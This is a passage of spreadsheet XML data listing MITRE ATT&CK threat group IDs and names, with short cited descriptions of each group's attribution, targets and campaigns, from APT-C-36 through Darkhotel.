  </si>
  <si>
    <t>G0108</t>
  </si>
  <si>
    <t>G0008</t>
  </si>
  <si>
    <t>G0114</t>
  </si>
  <si>
    <t>G0003</t>
  </si>
  <si>
    <t>G0080</t>
  </si>
  <si>
    <t>G0142</t>
  </si>
  <si>
    <t>G0052</t>
  </si>
  <si>
    <t>G0070</t>
  </si>
  <si>
    <t>G0079</t>
  </si>
  <si>
    <t>G0105</t>
  </si>
  <si>
    <t>G0012</t>
  </si>
  <si>
    <t>G0009</t>
  </si>
  <si>
    <t>G0017</t>
  </si>
  <si>
    <t>G0035</t>
  </si>
  <si>
    <t>G1011</t>
  </si>
  <si>
    <t>G1006</t>
  </si>
  <si>
    <t>G0066</t>
  </si>
  <si>
    <t>G1003</t>
  </si>
  <si>
    <t>G0020</t>
  </si>
  <si>
    <t>G0120</t>
  </si>
  <si>
    <t>G0051</t>
  </si>
  <si>
    <t>G0085</t>
  </si>
  <si>
    <t>G0053</t>
  </si>
  <si>
    <t>G0037</t>
  </si>
  <si>
    <t>G0046</t>
  </si>
  <si>
    <t>G0061</t>
  </si>
  <si>
    <t>G0137</t>
  </si>
  <si>
    <t>G0117</t>
  </si>
  <si>
    <t>G0093</t>
  </si>
  <si>
    <t>G0036</t>
  </si>
  <si>
    <t>G0115</t>
  </si>
  <si>
    <t>G0084</t>
  </si>
  <si>
    <t>G0047</t>
  </si>
  <si>
    <t>G0078</t>
  </si>
  <si>
    <t>G0043</t>
  </si>
  <si>
    <t>G0125</t>
  </si>
  <si>
    <t>G1001</t>
  </si>
  <si>
    <t>G0126</t>
  </si>
  <si>
    <t>G0100</t>
  </si>
  <si>
    <t>G0136</t>
  </si>
  <si>
    <t>G0119</t>
  </si>
  <si>
    <t>G0004</t>
  </si>
  <si>
    <t>G0094</t>
  </si>
  <si>
    <t>G1004</t>
  </si>
  <si>
    <t>G0032</t>
  </si>
  <si>
    <t>G0140</t>
  </si>
  <si>
    <t>G0077</t>
  </si>
  <si>
    <t>G0065</t>
  </si>
  <si>
    <t>G0030</t>
  </si>
  <si>
    <t>G0095</t>
  </si>
  <si>
    <t>G0059</t>
  </si>
  <si>
    <t>G0002</t>
  </si>
  <si>
    <t>G0103</t>
  </si>
  <si>
    <t>G0021</t>
  </si>
  <si>
    <t>G1009</t>
  </si>
  <si>
    <t>G0069</t>
  </si>
  <si>
    <t>G0129</t>
  </si>
  <si>
    <t>G0055</t>
  </si>
  <si>
    <t>G0019</t>
  </si>
  <si>
    <t>G0133</t>
  </si>
  <si>
    <t>G0049</t>
  </si>
  <si>
    <t>G0071</t>
  </si>
  <si>
    <t>G0068</t>
  </si>
  <si>
    <t>G1005</t>
  </si>
  <si>
    <t>G0056</t>
  </si>
  <si>
    <t>G0040</t>
  </si>
  <si>
    <t>G0011</t>
  </si>
  <si>
    <t>G0033</t>
  </si>
  <si>
    <t>G0024</t>
  </si>
  <si>
    <t>G0048</t>
  </si>
  <si>
    <t>G0075</t>
  </si>
  <si>
    <t>G0106</t>
  </si>
  <si>
    <t>G0034</t>
  </si>
  <si>
    <t>G0029</t>
  </si>
  <si>
    <t>G1008</t>
  </si>
  <si>
    <t>G0121</t>
  </si>
  <si>
    <t>G0091</t>
  </si>
  <si>
    <t>G0122</t>
  </si>
  <si>
    <t>G0083</t>
  </si>
  <si>
    <t>G0054</t>
  </si>
  <si>
    <t>G0038</t>
  </si>
  <si>
    <t>G0041</t>
  </si>
  <si>
    <t>G0039</t>
  </si>
  <si>
    <t>G0062</t>
  </si>
  <si>
    <t>G0092</t>
  </si>
  <si>
    <t>G0127</t>
  </si>
  <si>
    <t>G0088</t>
  </si>
  <si>
    <t>G0139</t>
  </si>
  <si>
    <t>G0089</t>
  </si>
  <si>
    <t>G0028</t>
  </si>
  <si>
    <t>G0027</t>
  </si>
  <si>
    <t>G0076</t>
  </si>
  <si>
    <t>G0131</t>
  </si>
  <si>
    <t>G0134</t>
  </si>
  <si>
    <t>G0081</t>
  </si>
  <si>
    <t>G0010</t>
  </si>
  <si>
    <t>G0123</t>
  </si>
  <si>
    <t>G0090</t>
  </si>
  <si>
    <t>G0107</t>
  </si>
  <si>
    <t>G0124</t>
  </si>
  <si>
    <t>G0112</t>
  </si>
  <si>
    <t>G0044</t>
  </si>
  <si>
    <t>G0102</t>
  </si>
  <si>
    <t>G0128</t>
  </si>
  <si>
    <t>G0018</t>
  </si>
  <si>
    <t>G0045</t>
  </si>
  <si>
    <t>APT-C-36</t>
  </si>
  <si>
    <t>APT1</t>
  </si>
  <si>
    <t>APT12</t>
  </si>
  <si>
    <t>APT16</t>
  </si>
  <si>
    <t>APT17</t>
  </si>
  <si>
    <t>APT18</t>
  </si>
  <si>
    <t>APT19</t>
  </si>
  <si>
    <t>APT28</t>
  </si>
  <si>
    <t>APT29</t>
  </si>
  <si>
    <t>APT3</t>
  </si>
  <si>
    <t>APT30</t>
  </si>
  <si>
    <t>APT32</t>
  </si>
  <si>
    <t>APT33</t>
  </si>
  <si>
    <t>APT37</t>
  </si>
  <si>
    <t>APT38</t>
  </si>
  <si>
    <t>APT39</t>
  </si>
  <si>
    <t>APT41</t>
  </si>
  <si>
    <t>Ajax Security Team</t>
  </si>
  <si>
    <t>Andariel</t>
  </si>
  <si>
    <t>Aoqin Dragon</t>
  </si>
  <si>
    <t>Aquatic Panda</t>
  </si>
  <si>
    <t>Axiom</t>
  </si>
  <si>
    <t>BITTER</t>
  </si>
  <si>
    <t>BRONZE BUTLER</t>
  </si>
  <si>
    <t>BackdoorDiplomacy</t>
  </si>
  <si>
    <t>BlackOasis</t>
  </si>
  <si>
    <t>BlackTech</t>
  </si>
  <si>
    <t>Blue Mockingbird</t>
  </si>
  <si>
    <t>Chimera</t>
  </si>
  <si>
    <t>Cleaver</t>
  </si>
  <si>
    <t>Cobalt Group</t>
  </si>
  <si>
    <t>Confucius</t>
  </si>
  <si>
    <t>CopyKittens</t>
  </si>
  <si>
    <t>Dark Caracal</t>
  </si>
  <si>
    <t>DarkHydrus</t>
  </si>
  <si>
    <t>DarkVishnya</t>
  </si>
  <si>
    <t>Darkhotel</t>
  </si>
  <si>
    <t>Deep Panda</t>
  </si>
  <si>
    <t>DragonOK</t>
  </si>
  <si>
    <t>Dragonfly</t>
  </si>
  <si>
    <t>EXOTIC LILY</t>
  </si>
  <si>
    <t>Earth Lusca</t>
  </si>
  <si>
    <t>Elderwood</t>
  </si>
  <si>
    <t>Ember Bear</t>
  </si>
  <si>
    <t>Equation</t>
  </si>
  <si>
    <t>Evilnum</t>
  </si>
  <si>
    <t>FIN10</t>
  </si>
  <si>
    <t>FIN4</t>
  </si>
  <si>
    <t>FIN5</t>
  </si>
  <si>
    <t>FIN6</t>
  </si>
  <si>
    <t>FIN7</t>
  </si>
  <si>
    <t>FIN8</t>
  </si>
  <si>
    <t>Ferocious Kitten</t>
  </si>
  <si>
    <t>Fox Kitten</t>
  </si>
  <si>
    <t>GALLIUM</t>
  </si>
  <si>
    <t>GCMAN</t>
  </si>
  <si>
    <t>GOLD SOUTHFIELD</t>
  </si>
  <si>
    <t>Gallmaker</t>
  </si>
  <si>
    <t>Gamaredon Group</t>
  </si>
  <si>
    <t>Gorgon Group</t>
  </si>
  <si>
    <t>Group5</t>
  </si>
  <si>
    <t>HAFNIUM</t>
  </si>
  <si>
    <t>HEXANE</t>
  </si>
  <si>
    <t>Higaisa</t>
  </si>
  <si>
    <t>Inception</t>
  </si>
  <si>
    <t>IndigoZebra</t>
  </si>
  <si>
    <t>Indrik Spider</t>
  </si>
  <si>
    <t>Ke3chang</t>
  </si>
  <si>
    <t>Kimsuky</t>
  </si>
  <si>
    <t>LAPSUS$</t>
  </si>
  <si>
    <t>Lazarus Group</t>
  </si>
  <si>
    <t>LazyScripter</t>
  </si>
  <si>
    <t>Leafminer</t>
  </si>
  <si>
    <t>Leviathan</t>
  </si>
  <si>
    <t>Lotus Blossom</t>
  </si>
  <si>
    <t>Magic Hound</t>
  </si>
  <si>
    <t>Moafee</t>
  </si>
  <si>
    <t>Mofang</t>
  </si>
  <si>
    <t>Molerats</t>
  </si>
  <si>
    <t>Moses Staff</t>
  </si>
  <si>
    <t>MuddyWater</t>
  </si>
  <si>
    <t>Mustang Panda</t>
  </si>
  <si>
    <t>NEODYMIUM</t>
  </si>
  <si>
    <t>Naikon</t>
  </si>
  <si>
    <t>Nomadic Octopus</t>
  </si>
  <si>
    <t>OilRig</t>
  </si>
  <si>
    <t>Orangeworm</t>
  </si>
  <si>
    <t>PLATINUM</t>
  </si>
  <si>
    <t>POLONIUM</t>
  </si>
  <si>
    <t>PROMETHIUM</t>
  </si>
  <si>
    <t>Patchwork</t>
  </si>
  <si>
    <t>PittyTiger</t>
  </si>
  <si>
    <t>Poseidon Group</t>
  </si>
  <si>
    <t>Putter Panda</t>
  </si>
  <si>
    <t>Rancor</t>
  </si>
  <si>
    <t>Rocke</t>
  </si>
  <si>
    <t>Sandworm Team</t>
  </si>
  <si>
    <t>Scarlet Mimic</t>
  </si>
  <si>
    <t>SideCopy</t>
  </si>
  <si>
    <t>Sidewinder</t>
  </si>
  <si>
    <t>Silence</t>
  </si>
  <si>
    <t>Silent Librarian</t>
  </si>
  <si>
    <t>SilverTerrier</t>
  </si>
  <si>
    <t>Sowbug</t>
  </si>
  <si>
    <t>Stealth Falcon</t>
  </si>
  <si>
    <t>Strider</t>
  </si>
  <si>
    <t>Suckfly</t>
  </si>
  <si>
    <t>TA459</t>
  </si>
  <si>
    <t>TA505</t>
  </si>
  <si>
    <t>TA551</t>
  </si>
  <si>
    <t>TEMP.Veles</t>
  </si>
  <si>
    <t>TeamTNT</t>
  </si>
  <si>
    <t>The White Company</t>
  </si>
  <si>
    <t>Threat Group-1314</t>
  </si>
  <si>
    <t>Threat Group-3390</t>
  </si>
  <si>
    <t>Thrip</t>
  </si>
  <si>
    <t>Tonto Team</t>
  </si>
  <si>
    <t>Transparent Tribe</t>
  </si>
  <si>
    <t>Tropic Trooper</t>
  </si>
  <si>
    <t>Turla</t>
  </si>
  <si>
    <t>Volatile Cedar</t>
  </si>
  <si>
    <t>WIRTE</t>
  </si>
  <si>
    <t>Whitefly</t>
  </si>
  <si>
    <t>Windigo</t>
  </si>
  <si>
    <t>Windshift</t>
  </si>
  <si>
    <t>Winnti Group</t>
  </si>
  <si>
    <t>Wizard Spider</t>
  </si>
  <si>
    <t>ZIRCONIUM</t>
  </si>
  <si>
    <t>admin@338</t>
  </si>
  <si>
    <t>menuPass</t>
  </si>
  <si>
    <t>[APT-C-36](https://attack.mitre.org/groups/G0099) is a suspected South America espionage group that has been active since at least 2018. The group mainly targets Colombian government institutions as well as important corporations in the financial sector, petroleum industry, and professional manufacturing.(Citation: QiAnXin APT-C-36 Feb2019)</t>
  </si>
  <si>
    <t>[APT1](https://attack.mitre.org/groups/G0006) is a Chinese threat group that has been attributed to the 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department’s (GSD) 3rd Department, commonly known by its Military Unit Cover Designator (MUCD) as Unit 61398. (Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[APT12](https://attack.mitre.org/groups/G0005) is a threat group that has been attributed to China. The group has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments.(Citation: Meyers Numbered Panda)</t>
  </si>
  <si>
    <t>[APT16](https://attack.mitre.org/groups/G0023) is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations. (Citation: FireEye EPS Awakens Part 2)</t>
  </si>
  <si>
    <t>[APT17](https://attack.mitre.org/groups/G0025) is a China-based threat group that has conducted network intrusions against U.S. government entities, the defense industry, law firms, information technology companies, mining companies, and non-government organizations. (Citation: FireEye APT17)</t>
  </si>
  <si>
    <t>[APT18](https://attack.mitre.org/groups/G0026) is a threat group that has operated since at least 2009 and has targeted a range of industries, including technology, manufacturing, human rights groups, government, and medical. (Citation: Dell Lateral Movement)</t>
  </si>
  <si>
    <t>[APT19](https://attack.mitre.org/groups/G0073) is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. (Citation: FireEye APT19) Some analysts track [APT19](https://attack.mitre.org/groups/G0073) and [Deep Panda](https://attack.mitre.org/groups/G0009) as the same group, but it is unclear from open source information if the groups are the same. (Citation: ICIT China's Espionage Jul 2016) (Citation: FireEye APT Groups) (Citation: Unit 42 C0d0so0 Jan 2016)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019)
[APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election. (Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). </t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) is threat group that has been attributed to Russia's Foreign Intelligence Service (SVR).(Citation: White House Imposing Costs RU Gov April 2021)(Citation: UK Gov Malign RIS Activity April 2021) They have operated since at least 2008, often targeting government networks in Europe and NATO member countries, research institutes, and think tanks. [APT29](https://attack.mitre.org/groups/G0016) reportedly compromised the Democratic National Committee starting in the summer of 2015.(Citation: F-Secure The Dukes)(Citation: GRIZZLY STEPPE JAR)(Citation: Crowdstrike DNC June 2016)(Citation: UK Gov UK Exposes Russia SolarWinds April 2021)
In April 2021, the US and UK governments attributed the SolarWinds supply chain compromise cyber operation to the SVR; public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021) Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, and Dark Halo.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) is a China-based threat group that researchers have attributed to China's Ministry of State Security.(Citation: FireEye Clandestine Wolf)(Citation: Recorded Future APT3 May 2017) This group is responsible for the campaigns known as Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.(Citation: FireEye Clandestine Wolf)(Citation: FireEye Operation Double Tap) As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong.(Citation: Symantec Buckeye)
In 2017, MITRE developed an APT3 Adversary Emulation Plan.(Citation: APT3 Adversary Emulation Plan)</t>
  </si>
  <si>
    <t>[APT30](https://attack.mitre.org/groups/G0013) is a threat group suspected to be associated with the Chinese government. While [Naikon](https://attack.mitre.org/groups/G0019) shares some characteristics with [APT30](https://attack.mitre.org/groups/G0013), the two groups do not appear to be exact matches.(Citation: FireEye APT30)(Citation: Baumgartner Golovkin Naikon 2015)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists with a strong focus on Southeast Asian countries like Vietnam, the Philippines, Laos, and Cambodia. They have extensively used strategic web compromises to compromise victims.(Citation: FireEye APT32 May 2017)(Citation: Volexity OceanLotus Nov 2017)(Citation: ESET OceanLotus)</t>
  </si>
  <si>
    <t>[APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)</t>
  </si>
  <si>
    <t>[APT37](https://attack.mitre.org/groups/G0067) is a North Korean state-sponsored cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. [APT37](https://attack.mitre.org/groups/G0067) has also been linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, North Korean Human Rights, and Evil New Year 2018.(Citation: FireEye APT37 Feb 2018)(Citation: Securelist ScarCruft Jun 2016)(Citation: Talos Group123)
North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.</t>
  </si>
  <si>
    <t>[APT38](https://attack.mitre.org/groups/G0082) is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, [APT38](https://attack.mitre.org/groups/G0082) has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which [APT38](https://attack.mitre.org/groups/G0082) stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017)
North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.</t>
  </si>
  <si>
    <t>[APT39](https://attack.mitre.org/groups/G0087) is one of several names for cyber espionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://attack.mitre.org/groups/G0087) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
</t>
  </si>
  <si>
    <t>[Ajax Security Team](https://attack.mitre.org/groups/G0130) is a group that has been active since at least 2010 and believed to be operating out of Iran. By 2014 [Ajax Security Team](https://attack.mitre.org/groups/G0130) transitioned from website defacement operations to malware-based cyber espionage campaigns targeting the US defense industrial base and Iranian users of anti-censorship technologies.(Citation: FireEye Operation Saffron Rose 2013)</t>
  </si>
  <si>
    <t>[Andariel](https://attack.mitre.org/groups/G0138) is a North Korean state-sponsored threat group that has been active since at least 2009. [Andariel](https://attack.mitre.org/groups/G0138) has primarily focused its operations--which have included destructive attacks--against South Korean government agencies, military organizations, and a variety of domestic companies; they have also conducted cyber financial operations against ATMs, banks, and cryptocurrency exchanges. [Andariel](https://attack.mitre.org/groups/G0138)'s notable activity includes Operation Black Mine, Operation GoldenAxe, and Campaign Rifle.(Citation: FSI Andariel Campaign Rifle July 2017)(Citation: IssueMakersLab Andariel GoldenAxe May 2017)(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)(Citation: TrendMicro New Andariel Tactics July 2018)(Citation: CrowdStrike Silent Chollima Adversary September 2021)
[Andariel](https://attack.mitre.org/groups/G0138) is considered a sub-set of [Lazarus Group](https://attack.mitre.org/groups/G0032), and has been attributed to North Korea's Reconnaissance General Bureau.(Citation: Treasury North Korean Cyber Groups September 2019)
North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.</t>
  </si>
  <si>
    <t>[Aoqin Dragon](https://attack.mitre.org/groups/G1007) is a suspected Chinese cyber espionage threat group that has been active since at least 2013. [Aoqin Dragon](https://attack.mitre.org/groups/G1007) has primarily targeted government, education, and telecommunication organizations in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. Security researchers noted a potential association between [Aoqin Dragon](https://attack.mitre.org/groups/G1007) and UNC94, based on malware, infrastructure, and targets.(Citation: SentinelOne Aoqin Dragon June 2022)</t>
  </si>
  <si>
    <t>[Aquatic Panda](https://attack.mitre.org/groups/G0143) is a suspected China-based threat group with a dual mission of intelligence collection and industrial espionage. Active since at least May 2020, [Aquatic Panda](https://attack.mitre.org/groups/G0143) has primarily targeted entities in the telecommunications, technology, and government sectors.(Citation: CrowdStrike AQUATIC PANDA December 2021)</t>
  </si>
  <si>
    <t>[Axiom](https://attack.mitre.org/groups/G0001) is a suspected Chinese cyber espionage group that has targeted the aerospace, defense, government, manufacturing, and media sectors since at least 2008. Some reporting suggests a degree of overlap between [Axiom](https://attack.mitre.org/groups/G0001) and [Winnti Group](https://attack.mitre.org/groups/G0044) but the two groups appear to be distinct based on differences in reporting on TTPs and targeting.(Citation: Kaspersky Winnti April 2013)(Citation: Kaspersky Winnti June 2015)(Citation: Novetta Winnti April 2015)</t>
  </si>
  <si>
    <t>[BITTER](https://attack.mitre.org/groups/G1002) is a suspected South Asian cyber espionage threat group that has been active since at least 2013. [BITTER](https://attack.mitre.org/groups/G1002) has primarily targeted government, energy, and engineering organizations in Pakistan, China, Bangladesh, and Saudi Arabia.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)</t>
  </si>
  <si>
    <t>[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) is a cyber espionage threat group that has been active since at least 2017. [BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has targeted Ministries of Foreign Affairs and telecommunication companies in Africa, Europe, the Middle East, and Asia.(Citation: ESET BackdoorDiplomacy Jun 2021)</t>
  </si>
  <si>
    <t>[BlackOasis](https://attack.mitre.org/groups/G0063) is a Middle Eastern threat group that is believed to be a customer of Gamma Group. The group has shown interest in prominent figures in the United Nations, as well as opposition bloggers, activists, regional news correspondents, and think tanks. (Citation: Securelist BlackOasis Oct 2017) (Citation: Securelist APT Trends Q2 2017) A group known by Microsoft as [NEODYMIUM](https://attack.mitre.org/groups/G0055) is reportedly associated closely with [BlackOasis](https://attack.mitre.org/groups/G0063) operations, but evidence that the group names are aliases has not been identified. (Citation: CyberScoop BlackOasis Oct 2017)</t>
  </si>
  <si>
    <t>[BlackTech](https://attack.mitre.org/groups/G0098) is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia--particularly Taiwan, Japan, and Hong Kong--and the US since at least 2013. [BlackTech](https://attack.mitre.org/groups/G0098) has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks.(Citation: TrendMicro BlackTech June 2017)(Citation: Symantec Palmerworm Sep 2020)(Citation: Reuters Taiwan BlackTech August 2020)</t>
  </si>
  <si>
    <t>[Blue Mockingbird](https://attack.mitre.org/groups/G0108) is a cluster of observed activity involving Monero cryptocurrency-mining payloads in dynamic-link library (DLL) form on Windows systems. The earliest observed Blue Mockingbird tools were created in December 2019.(Citation: RedCanary Mockingbird May 2020)</t>
  </si>
  <si>
    <t>[Carbanak](https://attack.mitre.org/groups/G0008) is a cybercriminal group that has used [Carbanak](https://attack.mitre.org/software/S0030) malware to target financial institutions since at least 2013. [Carbanak](https://attack.mitre.org/groups/G0008) may be linked to groups tracked separately as [Cobalt Group](https://attack.mitre.org/groups/G0080) and [FIN7](https://attack.mitre.org/groups/G0046) that have also used [Carbanak](https://attack.mitre.org/software/S0030) malware.(Citation: Kaspersky Carbanak)(Citation: FireEye FIN7 April 2017)(Citation: Europol Cobalt Mar 2018)(Citation: Secureworks GOLD NIAGARA Threat Profile)(Citation: Secureworks GOLD KINGSWOOD Threat Profile)</t>
  </si>
  <si>
    <t>[Chimera](https://attack.mitre.org/groups/G0114) is a suspected China-based threat group that has been active since at least 2018 targeting the semiconductor industry in Taiwan as well as data from the airline industry.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)</t>
  </si>
  <si>
    <t>[Cleaver](https://attack.mitre.org/groups/G0003) is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. (Citation: Cylance Cleaver) Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). (Citation: Dell Threat Group 2889)</t>
  </si>
  <si>
    <t>[Cobalt Group](https://attack.mitre.org/groups/G0080) is a financially motivated threat group that has primarily targeted financial institutions since at least 2016. The group has conducted intrusions to steal money via targeting ATM systems, card processing, payment systems and SWIFT systems. [Cobalt Group](https://attack.mitre.org/groups/G0080) has mainly targeted banks in Eastern Europe, Central Asia, and Southeast Asia. One of the alleged leaders was arrested in Spain in early 2018, but the group still appears to be active. The group has been known to target organizations in order to use their access to then compromise additional victims.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)(Citation: Proofpoint Cobalt June 2017)(Citation: RiskIQ Cobalt Nov 2017)(Citation: RiskIQ Cobalt Jan 2018) Reporting indicates there may be links between [Cobalt Group](https://attack.mitre.org/groups/G0080) and both the malware [Carbanak](https://attack.mitre.org/software/S0030) and the group [Carbanak](https://attack.mitre.org/groups/G0008).(Citation: Europol Cobalt Mar 2018)</t>
  </si>
  <si>
    <t>[Confucius](https://attack.mitre.org/groups/G0142) is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between [Confucius](https://attack.mitre.org/groups/G0142) and [Patchwork](https://attack.mitre.org/groups/G0040), particularly in their respective custom malware code and targets.(Citation: TrendMicro Confucius APT Feb 2018)(Citation: TrendMicro Confucius APT Aug 2021)(Citation: Uptycs Confucius APT Jan 2021)</t>
  </si>
  <si>
    <t>[CopyKittens](https://attack.mitre.org/groups/G0052) is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip.(Citation: ClearSky CopyKittens March 2017)(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015)</t>
  </si>
  <si>
    <t>[Dark Caracal](https://attack.mitre.org/groups/G0070) is threat group that has been attributed to the Lebanese General Directorate of General Security (GDGS) and has operated since at least 2012. (Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[DarkHydrus](https://attack.mitre.org/groups/G0079) is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks. (Citation: Unit 42 DarkHydrus July 2018) (Citation: Unit 42 Playbook Dec 2017)</t>
  </si>
  <si>
    <t>[DarkVishnya](https://attack.mitre.org/groups/G0105) is a financially motivated threat actor targeting financial institutions in Eastern Europe. In 2017-2018 the group attacked at least 8 banks in this region.(Citation: Securelist DarkVishnya Dec 2018)</t>
  </si>
  <si>
    <t>[Darkhotel](https://attack.mitre.org/groups/G0012) is a suspected South Korean threat group that has targeted victims primarily in East Asia since at least 2004. The group's name is based on cyber espionage operations conducted via hotel Internet networks against traveling executives and other select guests. [Darkhotel](https://attack.mitre.org/groups/G0012) has also conducted spearphishing campaigns and infected victims through peer-to-peer and file sharing networks.(Citation: Kaspersky Darkhotel)(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft Digital Defense FY20 Sept 2020)</t>
  </si>
  <si>
